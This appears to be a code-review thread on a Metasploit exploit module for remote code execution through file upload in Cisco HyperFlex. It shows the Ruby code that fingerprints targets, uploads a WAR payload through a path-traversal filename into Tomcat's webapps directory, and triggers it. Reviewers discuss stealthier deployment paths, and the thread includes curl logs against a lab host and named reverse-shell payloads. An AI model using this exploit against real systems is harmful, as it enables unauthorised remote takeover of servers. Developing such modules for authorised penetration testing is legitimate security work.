modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

```diff
@@ -0,0 +1,163 @@
+    # Installed Product: <title>Cisco HyperFlex Connect</title>
+    # Both the installer and installed product are vulnerable
+    datastore['RPORT'] = 443
+    datastore['SSL'] = true
+    res_ssl = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+    unless res_ssl.body[%r{<title>Hyperflex Installer</title>|<title>Cisco HyperFlex Connect</title>}]
+      return Exploit::CheckCode::Safe
+    end
+
+    # The vulnerability, however, lies on the HTTP endpoint /upload.
+    # Make the necessary changes to the datastore variables RPORT & SSL
+    datastore['RPORT'] = 80
+    datastore['SSL'] = false
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'upload')
+    )
+    if res && res.code == 400 && res.headers['Server'][/nginx/i] && res.body[/Apache Tomcat/]
+      return Exploit::CheckCode::Appears
+    elsif res && res.code == 404
+      return Exploit::CheckCode::Safe
+    end
+
+    CheckCode::Unknown
+  end
+
+  def prepare_payload(app_base, jsp_name)
+    print_status('Preparing payload...')
+    war_payload = payload.encoded_war({ app_name: app_base, jsp_name: jsp_name }).to_s
+    fname = app_base + '.war'
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(fname, nil, nil, 'form-data; name="fname"')
+    post_data.add_part('/upload', nil, nil, 'form-data; name="uploadDir"')
+    post_data.add_part(war_payload,
+                       'application/octet-stream', 'binary',
+                       "form-data; name=\"#{jsp_name}\"; filename=\"../../../lib/tomcat7/webapps/#{fname}\"")
+    post_data
+  end
+
+  def upload_payload(post_data)
+    print_status('Uploading payload...')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'upload'),
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+    if res && res.code == 200 && res.body.to_s =~ /result.*filename:/
+      print_good('Payload uploaded successfully')
+    else
+      fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code} when attempting to upload the payload")
+    end
+
+    # TODO: remove dependency of tomcat[7/8] being in /var/lib
+    #       Once we get a shell can we get the output of `pwd` and use that in the call to register_file_for_cleanup?
+    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml.war')
+    register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
+  end
+
+  def execute_payload(url)
+    print_status("Executing payload... calling: #{url}")
+    res = send_request_cgi(
+      'uri' => url,
+      'method' => 'GET'
+    )
+    if res && res.code == 200
+      print_good('Payload executed successfully')
+    else
+      print_error("Response code is: #{res.code}")
+      exit
+    end
+  end
+
+  def exploit
+    app_base = 'crossdomain.xml'
```

Comment:
FWIW, there are more discreet options that work with a Java payload.

Reply:
I assume I need to find a payload that returns a shell automatically when it deploys itself in the `tomcat7/webapps/` directory? That would remove the need to name the war file `crossdomain.xml.war`

I named the directory `crossdomain.xml` due to the nginx configuration - if named anything else I don't think I'm able to execute what's inside as I get a 301.

Success when named directory named `crossdomain.xml`:
```
➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/crossdomain.xml/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /crossdomain.xml/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:07:29 GMT
< Content-Type: text/html;charset=ISO-8859-1
< Content-Length: 6
< Connection: keep-alive
< Set-Cookie: JSESSIONID=9EDC41FB32DB4C8E66FDF87833703789; Path=/crossdomain.xml/; HttpOnly
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<






* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
```

Unsuccessful when named something else:
```
➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /jsp_shell_reverse_tcp/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:06:17 GMT
< Content-Type: text/html
< Content-Length: 184
< Connection: keep-alive
< Location: https://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
```

I've tried the following java payloads:
```
java/meterpreter/reverse_tcp
java/jsp_shell_reverse_tcp
java/shell_reverse_tcp
```
and am unable to get a shell without naming the directory `crossdomain.xml` . 
I might be making an incorrect assumption with regards to how need to execute the payload once uploaded.

Reply:
There are other nginx locations that work. I was using a payload servlet. Maybe we can go over the different approaches when I come back. :)